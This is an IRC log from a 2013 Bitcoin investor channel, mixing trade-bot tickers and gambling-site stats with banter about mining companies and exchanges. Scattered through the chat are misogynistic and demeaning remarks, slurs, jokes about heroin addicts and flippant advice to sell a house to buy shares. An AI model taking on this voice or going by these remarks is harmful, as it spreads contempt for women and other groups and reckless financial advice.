invested, 144.03 mio bets, 2.33 mio BTC wagered Sep 29 17:20:34 [HAVELOCK] [B] [XBOND] 2000 @ 0.00116822 = 2.3364 BTC [+] {3} Sep 29 17:21:43 ;;ticker Sep 29 17:21:44 MtGox BTCUSD ticker | Best bid: 145.10000, Best ask: 145.67998, Bid-ask spread: 0.57998, Last trade: 145.00005, 24 hour volume: 19566.85074886, 24 hour low: 139.80000, 24 hour high: 145.69196, 24 hour vwap: 143.46762 Sep 29 17:22:27 ;;bc,stats Sep 29 17:22:30 Current Blocks: 260756 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 1323 blocks | Next Difficulty In About: 1 week, 0 days, 13 hours, 26 minutes, and 23 seconds | Next Difficulty Estimate: 179120735.333 | Estimated Percent Change: 20.36131 Sep 29 17:30:59 !jd Sep 29 17:31:01 Just-Dice stat: 2312 BTC profit, 45.0k BTC invested, 144.04 mio bets, 2.35 mio BTC wagered Sep 29 17:33:50 !jd Sep 29 17:33:51 Just-Dice stat: 2477 BTC profit, 44.8k BTC invested, 144.04 mio bets, 2.35 mio BTC wagered Sep 29 17:34:33 wasn't someone up like 11k this month or did I see that wrong? Sep 29 17:36:57 !jd Sep 29 17:36:59 Just-Dice stat: 2947 BTC profit, 45.6k BTC invested, 144.04 mio bets, 2.36 mio BTC wagered Sep 29 17:37:11 Yes, the guy making this wild swing was up 11k BTC Sep 29 17:37:21 He's lost a few thousands now tho Sep 29 17:37:33 He's still up tho Sep 29 17:38:32 wow Sep 29 17:39:29 up 1.1^12 satoshi this month. *yawn* Sep 29 17:45:15 ;;calc 1.1**12 Sep 29 17:45:17 3.13842837672 Sep 29 17:45:23 up 3.13 satoshis Sep 29 17:46:17 lol my bad Sep 29 17:46:26 1.1x10^12 Sep 29 17:46:42 i need to go to bed Sep 29 17:47:59 hey Namworld can i get fbsd on xen? or is that an arij question Sep 29 17:50:51 arij question Sep 29 17:51:26 ok thx Sep 29 17:52:22 !jd Sep 29 17:52:31 Just-Dice stat: 1693 BTC profit, 43.1k BTC invested, 144.05 mio bets, 2.38 mio BTC wagered Sep 29 17:52:50 (sorry for the spam, I'm trying to color the lines with irssi) Sep 29 17:53:01 i wonder if periodic polling of the dice profit would actuyally qualify as entropy bearing. Sep 29 17:53:06 [BTCTC] [LABCOIN] 633 @ 0.000288 = 0.1823 BTC [-] Sep 29 17:54:55 it wouldn't i believe Sep 29 17:57:10 [BTCTC] [LABCOIN] 26528 @ 0.00029662 = 7.8687 BTC [+] {5} Sep 29 17:59:03 !jd Sep 29 17:59:04 Just-Dice stat: 2597 BTC profit, 43.0k BTC invested, 144.05 mio bets, 2.38 mio BTC wagered Sep 29 17:59:43 finally! http://i.imgur.com/3sYg8Zf.png Sep 29 18:00:13 [BTCTC] [ACTIVEMINING] 495 @ 0.001632 = 0.8078 BTC [+] Sep 29 18:04:10 lol Sep 29 18:04:11 https://bitcointalk.org/index.php?topic=304568.0;topicseen Sep 29 18:04:17 Crowdfunding to confront Mark Karpeles of MtGox Sep 29 18:05:23 lolwut Sep 29 18:06:43 "pay my trip to japan"? Sep 29 18:07:10 b4 kids arrive Sep 29 18:08:21 [HAVELOCK] [B] [XBOND] 3000 @ 0.00117 = 3.51 BTC [+] Sep 29 18:08:28 "I want to go see some Asian hookers, shall you pay?" Sep 29 18:08:33 people are fucking insane. Sep 29 18:08:39 bitcoinland has some real fucking mental cases. Sep 29 18:08:46 word. Sep 29 18:09:10 http://upload.wikimedia.org/wikipedia/commons/3/3e/Conjugation.svg Sep 29 18:09:17 what if fucking a girl meant she grows a pecker ? Sep 29 18:09:22 [BTCTC] [LABCOIN] 918 @ 0.00029124 = 0.2674 BTC [-] {3} Sep 29 18:10:40 they do have peckers..ever since i visited my first "big clits" site I stopped giving my girl head. Sep 29 18:11:13 women are nothing but men in drag with malformed genitals. Sep 29 18:11:43 a pecker? like a beak? Sep 29 18:11:55 As in B===D Sep 29 18:11:55 on their face? Sep 29 18:12:00 oh Sep 29 18:12:03 right Sep 29 18:12:05 that would be freakin weird Sep 29 18:12:12 go look up big clits dude Sep 29 18:12:18 they are penii Sep 29 18:12:23 ive seen that and im scared to look further Sep 29 18:12:31 KRS1: http://youtu.be/bI0-3BRjAYU Sep 29 18:12:34 right..it might ruin it for you too Sep 29 18:13:13 love clerks never saw 2..hmm Sep 29 18:13:26 [BTCTC] [ACTIVEMINING] 234 @ 0.001566 = 0.3664 BTC [-] {2} Sep 29 18:13:26 [BTCTC] [COGNITIVE] 6 @ 0.1398 = 0.8388 BTC [+] Sep 29 18:13:54 HAH i gotta see that Sep 29 18:14:37 Clits and Coins, #bitcoin-assets has it all. Sep 29 18:15:28 [BTCTC] [LABCOIN] 772 @ 0.00028816 = 0.2225 BTC [-] {2} Sep 29 18:16:29 [BTCTC] [LABCOIN] 2228 @ 0.00028008 = 0.624 BTC [-] {3} Sep 29 18:16:50 heh Sep 29 18:19:52 ;;premium bitstamp mtgox Sep 29 18:19:55 bitstamp premium over mtgox is currently -12.4682806392 %. Sep 29 18:21:32 http://www.salon.com/2013/09/26/nationwide_it_glitch_wipes_balances_and_deletes_accounts_newscred/ Sep 29 18:21:34 herp Sep 29 18:21:35 IT glitch “wipes balances and deletes accounts” - Salon.com Sep 29 18:29:42 [BTCTC] [LABCOIN] 966 @ 0.000281 = 0.2714 BTC [+] Sep 29 18:38:37 !t BTCTCO BITVPS Sep 29 18:38:40 [BTCT:BITVPS] 1D: 0.000901 / 0.00098 / 0.001698 (3101 shares, 3 BTC), 7D: 0.000025 / 0.001 / 0.0019 (36816 shares, 37 BTC), 30D: 0.000025 / 0.00115 / 0.002752 (42128 shares, 48.3 BTC) Sep 29 18:39:02 so, where is bitvps going? Sep 29 18:39:12 not going anywhere at the moment Sep 29 18:39:16 oh you mean exchange Sep 29 18:39:21 Probably Havelock Sep 29 18:39:25 if we can work it out Sep 29 18:40:53 [HAVELOCK] [HIM] 2 @ 0.17229997 = 0.3446 BTC [-] Sep 29 18:41:55 [HAVELOCK] [AM100] 8 @ 0.0138 = 0.1104 BTC [-] Sep 29 18:41:56 [BTCTC] [LABCOIN] 1666 @ 0.000299 = 0.4981 BTC [-] Sep 29 18:43:00 is labcoin buying bitvps? Sep 29 18:44:29 are they? its news to me Sep 29 18:45:42 i thought labcoin was buying virgin atlantic. Sep 29 18:49:02 [HAVELOCK] [HIM] 1 @ 0.17229997 BTC [-] Sep 29 18:49:37 mmm labcoin has virgins? Sep 29 18:49:44 maybe i should invest! Sep 29 18:49:52 lol Sep 29 18:49:57 :P Sep 29 18:50:04 [HAVELOCK] [AM100] 7 @ 0.01434998 = 0.1004 BTC [+] Sep 29 18:52:05 [BTCTC] [LABCOIN] 598 @ 0.000281 = 0.168 BTC [-] Sep 29 18:54:18 nobody is buying bitvps Sep 29 18:54:21 as far as we know Sep 29 18:54:36 we are making too much to sell atm Sep 29 18:54:37 lol Sep 29 18:54:50 we've been waiting for profits ever since we took the biz over from rg Sep 29 18:55:08 had to re-arrange our hosting, buy gear, migrate customers, blah blah blah Sep 29 18:55:34 should i sell my house and buy labcoin shares? Sep 29 18:55:37 really cheap atm Sep 29 18:55:46 sell house and buy bitvps shares? yes you should Sep 29 18:55:56 no labcoin Sep 29 18:56:09 [BTCTC] [LABCOIN] 796 @ 0.000298 = 0.2372 BTC [+] {2} Sep 29 18:56:20 i dont know about labcoin. sorry Sep 29 18:57:10 [BTCTC] [KENILWORTH] 117 @ 0.00141 = 0.165 BTC [+] Sep 29 18:57:26 lol Sep 29 18:58:29 although if some one responds to him. i might sell my house too Sep 29 18:58:51 !jd Sep 29 18:59:00 Just-Dice stat: -4509 BTC profit, 38.7k BTC invested, 144.09 mio bets, 2.48 mio BTC wagered Sep 29 18:59:04 lol Sep 29 18:59:07 -4509 Sep 29 18:59:08 wow Sep 29 18:59:11 [BTCTC] [BASIC-MINING] 4 @ 0.0463 = 0.1852 BTC [-] {2} Sep 29 18:59:18 it was 222 two days ago Sep 29 18:59:29 and -2000-something just before that Sep 29 18:59:34 talk about yo-yo Sep 29 19:00:20 2h ago Just-Dice stat: 722 BTC profit, 45.7k BTC invested, 144.01 mio bets, 2.29 mio BTC wagered Sep 29 19:00:34 hah Sep 29 19:00:41 someone broke the bank again? Sep 29 19:00:45 try 4.7k Sep 29 19:00:50 it was 4.7k a few hours ago Sep 29 19:06:19 [BTCTC] [FIMB] 170 @ 0.00700483 = 1.1908 BTC [+] {4} **** BEGIN LOGGING AT Mon Sep 30 03:06:21 2013 Sep 30 03:09:42 only marginally Sep 30 03:11:08 [BTCTC] [B] [CIPHERMINE.B1] 703 @ 0.008999 = 6.3263 BTC [-] Sep 30 03:12:09 [BTCTC] [LABCOIN] 2704 @ 0.00027966 = 0.7562 BTC [+] {2} Sep 30 03:12:10 the baseline for comparison is building viable businesses, no? Sep 30 03:12:18 in and of itself a nontrivial pursuit. Sep 30 03:16:13 [HAVELOCK] [CBTC] 16601 @ 0.00031481 = 5.2262 BTC [-] {7} Sep 30 03:16:18 i've got a great idea for a business Sep 30 03:17:14 [HAVELOCK] [CBTC] 2000 @ 0.0003012 = 0.6024 BTC [-] {2} Sep 30 03:17:26 send me bitcoin, then when you go to jail, i send weekly dollar payments for cigarettes, chocolate, protection, whatever Sep 30 03:18:06 Nontrivial Pursuit Sep 30 03:18:12 sounds like a game that'd never take off. Sep 30 03:18:15 [HAVELOCK] [CBTC] 826 @ 0.0003011 = 0.2487 BTC [-] {3} Sep 30 03:18:19 sounds good. how do I go to jail? Sep 30 03:18:50 you do not ass blo. Sep 30 03:18:59 ;;eauth mircea_popescu Sep 30 03:19:02 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Sep 30 03:20:18 [HAVELOCK] [AM100] 25 @ 0.01336 = 0.334 BTC [+] Sep 30 03:21:19 [HAVELOCK] [CBTC] 11500 @ 0.0003 = 3.45 BTC [-] {2} Sep 30 03:22:45 ;;everify freenode:#bitcoin-otc:ef87063bf8a554118a8de6cd550369451a900107c909da00b200fc7b Sep 30 03:22:46 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Sep 30 03:25:35 unlikely to take off unless entry were already purchased by, say, one's parents, and not playing weren't an option. Sep 30 03:26:07 such a subjective game Sep 30 03:26:20 the lifestyle of the enthusiastic heroin user seems fairly trivial to me Sep 30 03:26:31 but i imagine one of them would find it non trivial Sep 30 03:26:34 now in that you would be wrong. Sep 30 03:26:51 it's one of the masteries. sort of like normal life on hard difficulty. Sep 30 03:27:03 have you tried? Sep 30 03:27:07 what, enthusiastic heroin use or building companies? Sep 30 03:27:12 most peons survive their entire lives on about half what the heroin addict needs just to stay afloat, Sep 30 03:27:23 and most peons have a much easier time getting a job. Sep 30 03:28:15 is this popescuism? Sep 30 03:28:26 [BTCTC] [LABCOIN] 10976 @ 0.00027939 = 3.0666 BTC [-] {6} Sep 30 03:28:38 lol copumpkin remember popescuity ? it lives! Sep 30 03:29:08 hm Sep 30 03:29:19 maybe hard, but not challenging. Sep 30 03:29:26 in the sense that lifting heavy things is hard Sep 30 03:29:26 now how does that work ? Sep 30 03:29:27 [BTCTC] [LABCOIN] 1500 @ 0.000298 = 0.447 BTC [+] Sep 30 03:29:33 but one can always throw more humans at it Sep 30 03:29:42 or more junkie hours Sep 30 03:29:50 one can not throw more humans at your own subjective sensation of burning pain from hell. Sep 30 03:30:05 no but one can beg more agressively or steal Sep 30 03:30:23 humans as a commodity for the resourcseful addict Sep 30 03:30:29 challenging should have been complex Sep 30 03:30:45 it is, it is. Sep 30 03:31:29 complex being relative to one's abilities? Sep 30 03:31:36 and the peons lift heavy things for money while others pay to lift heavy things Sep 30 03:32:30 yes benkay. heroin addicts that are still alive are significantly craftier, more able better people than your average local college grad. Sep 30 03:32:38 the only problem with them is that they're addicted. Sep 30 03:33:02 theres an ex junkie on the new season of survivor, hes a yoga teacher now Sep 30 03:33:12 crafty as fuck Sep 30 03:34:24 makes sense. the constraints are far stiffer for the junkie population, so only the strong? Sep 30 03:34:27 slash crafty Sep 30 03:34:35 in general it's a better investment to take a junkie chick and get her off the habit than to take a "normal" loser and try to get her sane. Sep 30 03:35:49 its trivial Sep 30 03:37:36 dag Sep 30 03:37:49 now i want to acquire a junkie Sep 30 03:38:10 does any junkie suffice? how does one spot the particularly craft ones? Sep 30 03:38:51 when you ask them not to ash on your couch, they set fire to it Sep 30 03:40:22 jesus this consumerist attitude. no "any" doesn't suffice, they're fucking people not campbell soup cans. Sep 30 03:40:59 hey man it's a setup for the second question Sep 30 03:41:09 lolk Sep 30 03:41:20 sheesh grow a sense of humor Sep 30 03:41:39 [BTCTC] [LABCOIN] 24261 @ 0.0003026 = 7.3414 BTC [+] {7} Sep 30 03:41:40 about interchangeable humans Sep 30 03:42:02 shes the one with a roll of fifties in her fannypack Sep 30 03:43:31 which is really just a honeypot incase anyone is stupid enough to rob her Sep 30 03:46:47 mircea_popescu has thought experimented a new currency Sep 30 03:46:51 addict-coin Sep 30 03:47:02 i has ? Sep 30 03:47:14 gimme Sep 30 03:47:20 how do you mine it? Sep 30 03:47:24 each coin is redeemable for a shot of heroin directly into the eye Sep 30 03:47:30 mined buy killing other junkies Sep 30 03:47:44 by* Sep 30 03:48:02 hmm… that's a quicly deflating currency. good job Sep 30 03:48:33 half the coins could go to buying acres in laos Sep 30 03:49:47 heroin coems from the stans. Sep 30 03:51:20 well we could do hashcoin there too Sep 30 03:51:54 http://www.gwern.net/Bitcoin%20is%20Worse%20is%20Better Sep 30 03:51:56 Bitcoin is Worse is Better Sep 30 03:54:08 "Bitcoin involves no major intellectual breakthroughs" Sep 30 03:54:12 http://fc07.deviantart.net/fs70/i/2013/211/3/a/leeloo_dallas_multipass_july_2012_by_tanuki_tinka_asai-d5h39rc.jpg Sep 30 03:54:29 dude, I seriously perceive the need for more mediocre fuckwits to go down the "so what, it could have happened to anybody" path. Sep 30 03:54:51 [BTCTC] [LABCOIN] 10000 @ 0.00034206 = 3.4206 BTC [+] {4} Sep 30 03:55:06 "If the idea is (relatively) easy to understand and uses basic ideas" Sep 30 03:55:41 when I am tyrant this sort of shit is factual evidence sufficient for a death conviction. Sep 30 03:56:26 what's on your todo list for when you are tyrant? Sep 30 03:56:38 you are tyrant Sep 30 03:58:21 so far the above. Sep 30 03:58:27 o, but since you ask : Sep 30 03:58:52 all children born in the us and western europe would spend their 8th year of life in subsaharan africa, Sep 30 03:58:55 and vice-versa. Sep 30 03:59:15 sorta like family exchange, but universal and mandatory. Sep 30 03:59:20 heavy Sep 30 03:59:33 you wopn' hear any 9yos whining about their ipad anymore. Sep 30 03:59:45 it'd just be... dude... this place you old folks built here... is so coool! Sep 30 03:59:55 why there's not even any ringworms in the drinking water! Sep 30 04:00:09 swap your ipad for a 1laptopperchild for a year and learn linux Sep 30 04:00:19 clearly there's something to being white and european rather than retarded. i wish to learn all about it! Sep 30 04:00:21 oh, I remember the tweets that were "I hate my parents, they didn't get me an (iphone|ipad|car) for christmas" Sep 30 04:00:53 and it really was "I hate my parents" Sep 30 04:01:58 [BTCTC] [LABCOIN] 6000 @ 0.00035934 = 2.156 BTC [+] {5} Sep 30 04:02:34 we already have this in australia, mandatory trip to bali when 8 Sep 30 04:02:59 [HAVELOCK] [CBTC] 10000 @ 0.00029 = 2.9 BTC [-] {2} Sep 30 04:04:18 mircea_popescu: how is citizenship bestowed under your tyrancy? Sep 30 04:04:32 it's not 200 years living in a penal colony that toughens us up, it's that week in kuta Sep 30 04:04:46 and what obligations does it come with? Sep 30 04:07:04 must pay for statue Sep 30 04:07:28 i have no idea. Sep 30 04:07:32 i guess you have to be in my wot. Sep 30 04:08:08 statue generates income Sep 30 04:08:23 also I am drinking a mug of champagne right now, because the fucking insane serbs broke all my flutes over the previous rounds today ;/ Sep 30 04:09:04 what reality is that? Sep 30 04:09:05 [BTCTC] [NASTY-PT] 98 @ 0.001299 = 0.1273 BTC [+] Sep 30 04:09:35 hm ? Sep 30 04:10:04 serbs flutes rounds? Sep 30 04:10:34 serbs are a (small) people. Sep 30 04:10:39 lol Sep 30 04:10:40 flutes are what you normally drink the stuff in Sep 30 04:10:51 oh i see Sep 30 04:11:06 was it their cats, or their loud talking? Sep 30 04:11:07 [BTCTC] [NASTY-PT] 100 @ 0.001299 = 0.1299 BTC [+] Sep 30 04:11:07 [BTCTC] [LABCOIN] 3000 @ 0.00033 = 0.99 BTC [-] Sep 30 04:11:08 well unless youy're a titglass type, but i never cared for those Sep 30 04:11:33 no it was this retarded habit to break glasses when you're drinking. Sep 30 04:12:12 weve got lots of them here too, since the borders moved. Sep 30 04:12:55 where's here ? Sep 30 04:13:02 straya Sep 30 04:13:37 the ones that have been here for 50 years are really something Sep 30 04:13:57 i c Sep 30 04:14:56 you find them in remote mining towns, answering to noone Sep 30 04:15:11 sounds about right. Sep 30 04:15:35 the ones from 10 years ago live next door, steal your cat and break your glasses Sep 30 04:16:51 you didnt want the cat anyway, so theyre pretty cool Sep 30 04:18:04 thestringpuller : "Lydia is as loose as the ass of a bronzed horseman, as a swift hoop that rings with the melodious bronze, as the wheel so often passed through with the springboard without being touched, as an old shoe soaked in muddy water, as the sparse nets that wait for errant thrushes, as the awnings denied to the wind at Pompey's Theater, as a bracelet fallen from a tuberculotic passive [cinaedo], as a mattress Sep 30 04:18:04 having lost its Leuconian wool, as old trousers of a Britonic pauper, and as the ugly throat of a Ravennan pelican. I am said to have fucked her in a marine fishpond. I do not know; I think I fucked the fishpond." Sep 30 04:18:11 as you can see, i am a pale imitation of the classics. Sep 30 04:19:57 sounds like something my girlfriend might read Sep 30 04:23:02 mp how many languages can you speak? Sep 30 04:23:14 a few! Sep 30 04:23:37 lets do a coffee table book Sep 30 04:23:41 that was vague Sep 30 04:23:51 about coffee tables? Sep 30 04:24:16 or maybe its a trashy travel novel Sep 30 04:24:22 Pankkake , you are a very talented troll Sep 30 04:24:35 And I mean that in a good way Sep 30 04:24:35 jborkl: not enough to be paid for it Sep 30 04:24:35 he's not bad. Sep 30 04:24:47 pankkake there are some fields where the very best work for free. Sep 30 04:24:53 whoring. trolling. stuff like that. Sep 30 04:24:58 thankyou Sep 30 04:25:26 Looks like almost all the mining bullshit has hit the fan Sep 30 04:25:35 it did? Sep 30 04:25:47 we'll crowdfund it, tailors, money and drinking Sep 30 04:25:54 yes, many of my strong points don't give me much income Sep 30 04:26:21 we simply must see my guy in bangalore Sep 30 04:26:34 Well, looks like no knc. No Avalon clones, no labcoin and I have not checked on assdrill Sep 30 04:26:44 haha assdrill Sep 30 04:27:25 Mr Ass D. Reel, esq. Sep 30 04:27:54 I'm sure KnC will eventually deliver Sep 30 04:27:57 jborkl but seriously, didn't they send an email inviting people to pick up their units over this weekend ? Sep 30 04:28:24 [BTCTC] [LABCOIN] 8936 @ 0.00031746 = 2.8368 BTC [-] {6} Sep 30 04:28:41 Really? I was reading the thread and people seem to be clueless Sep 30 04:28:58 No that that is anything new on the forum Sep 30 04:29:07 labcoin is supposed to be doing an irc q&a, but has not stated excatly when (as usual) Sep 30 04:29:20 it's going to be their final stand I feel Sep 30 04:30:38 a suit made in bangalore, grow a mostache on the train, then spend the night ignoring bollywood princesses in mumbai, the lulz! Sep 30 04:30:46 should be a pretty decent place to trolkkake. Sep 30 04:31:38 all for the princyly sum of not many ruppees Sep 30 04:32:28 [BTCTC] [FN] [DMS.SELLING] 142 @ 0.00504872 = 0.7169 BTC [+] {2} Sep 30 04:32:51 "They are more than vague intentions. We are highly organised and between us are investing a significant amount in this gambit (>>$100k). I am currently getting advice from my lawyers and accountants re. avoiding a similar fate to Burnside." Sep 30 04:32:59 you can't make this shit up. Sep 30 04:33:03 yeah i saw that Sep 30 04:33:05 100k Sep 30 04:33:16 100k buys you like, ALL THE LAWYERS Sep 30 04:33:16 yet she had to sell her shares Sep 30 04:33:18 a hundred shitbucks! Sep 30 04:33:22 a few days ago Sep 30 04:33:30 actually they can probably lobby congress. Sep 30 04:34:00 maybe she had to pay for the wedding Sep 30 04:34:14 smart girls make money out of weddings. to pay for one... Sep 30 04:34:15 heh. Sep 30 04:34:30 who said anything about smart Sep 30 04:34:43 her mom. Sep 30 04:34:56 but i suspect she was either confused or misunderstood. Sep 30 04:35:04 :) Sep 30 04:35:21 since when can a direwctor bankrupt a company to pay for personal legal costs? since capitalism got real Sep 30 04:35:28 Hmm, you can get a lawyer to make your unregulated exchange legal for only 100 k? Sep 30 04:35:36 is this q/a going on right now? Sep 30 04:35:38 jborkl nono, 100k is the total. Sep 30 04:35:42 lawyer gets a fraction. Sep 30 04:36:13 benkay yes, in a highly secure metaphysical environment where bfl shipments and mtgox withdrawals are also taking place Sep 30 04:36:30 Oh well, you know attorney s that do security law are cheap Sep 30 04:36:32 [BTCTC] [LABCOIN] 2235 @ 0.00031183 = 0.6969 BTC [-] {2} Sep 30 04:36:53 any lawyer taking bitcoin money now is winning x1000000 Sep 30 04:37:23 Better call Sal Sep 30 04:37:24 "that kate character's site is all mottoed out with "a female entrepreneur!" "a female techie!" and it's like...bizarre, it's like acquiring traits which you don't naturally have but want, and then acting as though those same traits are a disadvantage that you've persevered through or something." Sep 30 04:37:24 yeah that'll be 1000 hours while we worek out what the fuck is going on... Sep 30 04:37:38 naturally born cunts are apparently weirded out by the synthetically created kate. Sep 30 04:38:06 http://www.youtube.com/watch?v=juTeHsKPWhY Sep 30 04:38:07 James Brown - It's A Man's Man's Man's World - YouTube Sep 30 04:39:34 sorry satoshi Sep 30 04:40:34 i told yall to get warfendales Sep 30 04:41:41 then we need the flac streaming bot for .1 a moneth mp Sep 30 04:42:07 fuck itunes and utube in the ass Sep 30 04:43:15 tru dat Sep 30 04:43:39 [BTCTC] [LABCOIN] 1344 @ 0.0003185 = 0.4281 BTC [+] {2} Sep 30 04:44:38 !jd Sep 30 04:44:40 Just-Dice stat: -3109 BTC profit, 38.1k BTC invested, 144.53 mio bets, 3.64 mio BTC wagered Sep 30 04:44:58 Vexual: if only we could reference data on the web by name... Sep 30 04:45:04 did the chinaman return? Sep 30 04:45:30 saw what ben? Sep 30 04:45:41 [BTCTC] [NASTY-PT] 100 @ 0.001299 = 0.1299 BTC [+] Sep 30 04:46:09 vex is fine, but i don't undertand Sep 30 04:46:13 instead of asking youtube for some crappy copy of the thing you're looking for Sep 30 04:46:26 wait. 3.64mn wagered ?! Sep 30 04:46:30 exactly Sep 30 04:46:42 , 2.33 mio BTC wagered YESTERDAY Sep 30 04:46:50 yes Sep 30 04:46:59 whoa ok this is ridoinculous. Sep 30 04:47:04 Vexual: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&ved=0CDYQtwIwAQ&url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoCZMoY3q2uM&ei=CNhIUubCDsmOrAHB5YHgAw&usg=AFQjCNHBqoinLlepwFIzzeNFct-o68NxfA&sig2=u_GJWmzbGWeYmOK2ofPT_A&bvm=bv.53217764,d.aWM Sep 30 04:47:15 isn't the sirte supposed to on average make 2% ? Sep 30 04:47:17 or, https://www.youtube.com/watch?v=oCZMoY3q2uM Sep 30 04:47:35 1% Sep 30 04:47:43 [BTCTC] [NASTY-PT] 100 @ 0.00129948 = 0.1299 BTC [+] {2} Sep 30 04:47:48 Is is only off a little, from the expected 32000 Sep 30 04:47:49 you can't simply identify a song by name Sep 30 04:48:04 jborkl im starting to think that the end result variation is perhaps too much. Sep 30 04:48:04 lord no Sep 30 04:48:06 ben, you're doing it wrong. Sep 30 04:48:07 naming is complicated Sep 30 04:48:09 http://www.youtube.com/watch?v=3YPCdJbZYXo Sep 30 04:49:00 i mean, 1.3mn in bets takes it from +2 to -3 instead of the expected +15 ?! Sep 30 04:49:15 The math is definently not working well Sep 30 04:49:29 gotta let it play Sep 30 04:49:30 it's a small number of big bets Sep 30 04:49:52 pankkake it can't be. because 1.3mn wagered. Sep 30 04:50:02 jhas to be 1000s of bets, since iirc they have very small max limits Sep 30 04:50:11 crying when profit hits -1% ... not maths Sep 30 04:50:20 indeed… Sep 30 04:51:21 Well they lowered the max win , and the site is down 3000 since Sep 30 04:51:28 course the damned thing with randomness : anyhing's possible. Sep 30 04:51:33 So that did not work yet Sep 30 04:51:48 2 months Sep 30 04:52:16 Yes it is, I know a lady with 14 kids- all boys Sep 30 04:52:28 So shiny happens Sep 30 04:52:31 Shit Sep 30 04:52:44 Unless she got hacked Sep 30 04:52:55 someone found her private key Sep 30 04:52:56 who is this chris joker nayway? Sep 30 04:52:57 lmao Sep 30 04:53:49 [BTCTC] [BASIC-MINING] 6 @ 0.04799 = 0.2879 BTC [+] {2} Sep 30 04:53:49 [BTCTC] [LABCOIN] 18330 @ 0.00030011 = 5.501 BTC [-] {4} Sep 30 04:56:35 taking 1 random human out of 7 billion, it's just as likely this cat can't read the atomic clock as varience Sep 30 04:59:33 in all likelyhood, hes commoner Sep 30 05:01:03 how to make qt make chash register noise on incoming transaction? Sep 30 05:03:46 seriously i want it Sep 30 05:05:00 [BTCTC] [RSM] 105 @ 0.003288 = 0.3452 BTC [-] Sep 30 05:06:01 [BTCTC] [LABCOIN] 870 @ 0.000309 = 0.2688 BTC [+] Sep 30 05:07:02 [BTCTC] [FN] [DMS.SELLING] 136 @ 0.005049 = 0.6867 BTC [+] Sep 30 05:08:03 [BTCTC] [LABCOIN] 435 @ 0.000309 = 0.1344 BTC [+] Sep 30 05:10:07 implement frp Sep 30 05:10:11 with qt Sep 30 05:10:17 lellerblords Sep 30 05:10:54 http://www.youtube.com/watch?v=YyaUtnWr8Gw Sep 30 05:10:54 Easy Rider - Jack Nicholson about freedom Dennis Hopper Peter Fonda - YouTube Sep 30 05:18:18 best explanation of free market ever : Sep 30 05:18:20 "During the Gallic Wars, when Julius Caesar brought his troops to Cabyllona in 59 BC, he found two Roman wine merchants already established in business trading with the local tribes." Sep 30 05:19:11 we probably taught them something about vines once we got some Sep 30 05:22:17 hi what's the main btc addresses that asicminer uses mining divs and hardware selling divs? Sep 30 05:23:05 http://www.movieweb.com/movie/hell-ride/dennis-hopper-interview Sep 30 05:23:06 Hell Ride Dennis Hopper Interview - MovieWeb.com Sep 30 05:23:18 [MPEX] [S.MPOE] 2300 @ 0.00084009 = 1.9322 BTC [-] Sep 30 05:23:18 friedcat is pistolero Sep 30 05:26:21 [HAVELOCK] [B] [XBOND] 2000 @ 0.00111002 = 2.22 BTC [-] {7} Sep 30 05:27:22 [HAVELOCK] [B] [XBOND] 188 @ 0.00111 = 0.2087 BTC [-] Sep 30 05:28:00 mp is romeo Sep 30 05:28:24 http://www.youtube.com/watch?v=_lZgr0opCfs Sep 30 05:28:39 YOU WOULDN'T FIGHT A LEOPARD Sep 30 05:33:28 [BTCTC] [LABCOIN] 2321 @ 0.00030975 = 0.7189 BTC [+] {2} Sep 30 05:34:29 [BTCTC] [LABCOIN] 2313 @ 0.00030959 = 0.7161 BTC [-] {3} Sep 30 05:35:30 [BTCTC] [LABCOIN] 967 @ 0.00031 = 0.2998 BTC [+] Sep 30 05:36:31 [BTCTC] [LABCOIN] 4045 @ 0.00031975 = 1.2934 BTC [+] {3} Sep 30 05:36:41 hi Sep 30 05:37:32 [BTCTC] [LABCOIN] 5952 @ 0.00033 = 1.9642 BTC [+] {2} Sep 30 05:37:51 http://www.youtube.com/watch?v=ZmuFTF-z32U Sep 30 05:37:51 Sgt. Stedenko - YouTube Sep 30 05:43:38 [BTCTC] [LABCOIN] 14250 @ 0.00034893 = 4.9723 BTC [+] {5} Sep 30 05:44:19 thats the nsa Sep 30 05:44:50 now paid it bitcoin :) Sep 30 05:45:58 merry xmas Sep 30 05:47:08 satoshi still shrugs and the rich get richer Sep 30 05:49:44 [BTCTC] [ACTIVEMINING] 108 @ 0.001561 = 0.1686 BTC [-] Sep 30 05:51:47 cant fuck with anarchistic motives Sep 30 05:53:48 [BTCTC] [ASICMINER-PT] 1 @ 1.323 BTC [+] Sep 30 05:54:13 "Anyone attempting to generate random numbers by deterministic means is, of course, living in a state of sin." -- John Von Neumann Sep 30 05:54:49 [BTCTC] [ASICMINER-PT] 1 @ 1.326 BTC [+] Sep 30 05:55:50 [BTCTC] [FN] [BTC-GROWTH] 2 @ 0.08498 = 0.17 BTC [+] {2} Sep 30 05:59:54 [BTCTC] [ASICMINER-PT] 1 @ 1.321 BTC [-] Sep 30 06:02:49 {detrate} anyone want to sell me 11 btc for $50 PPUSD? Sep 30 06:03:17 from http://trilema.com/2012/de-ziua-indragostitilor-care-daca-bine-am-inteles-este-si-astazi/ which was early 2012 :D Sep 30 06:09:03 [BTCTC] [ASICMINER-PT] 2 @ 1.302 = 2.604 BTC [-] {2} Sep 30 06:12:42 pp? Sep 30 06:13:07 [BTCTC] [PETA-MINE] 5 @ 0.52202 = 2.6101 BTC [-] {2} Sep 30 06:14:07 [BTCTC] [LABCOIN] 6450 @ 0.0003499 = 2.2569 BTC [+] {2} Sep 30 06:14:24 paypal Sep 30 06:18:00 i made an account and took $40 Sep 30 06:18:36 nowadays everythging seems like years of servitude Sep 30 06:19:12 [BTCTC] [LABCOIN] 2620 @ 0.00032026 = 0.8391 BTC [-] {2} Sep 30 06:20:51 mention bali or slaves and the goat quits Sep 30 06:22:15 [BTCTC] [ASICMINER-PT] 2 @ 1.3245 = 2.649 BTC [+] {2} Sep 30 06:23:16 [BTCTC] [ASICMINER-PT] 3 @ 1.32666666 = 3.98 BTC [+] {3} Sep 30 06:26:23 Look at mircea_popescu Breaking Bad over here Sep 30 06:26:51 hes a young mcafee Sep 30 06:27:55 cook up dat cocaine Sep 30 06:28:14 ....you cook crack Sep 30 06:28:20 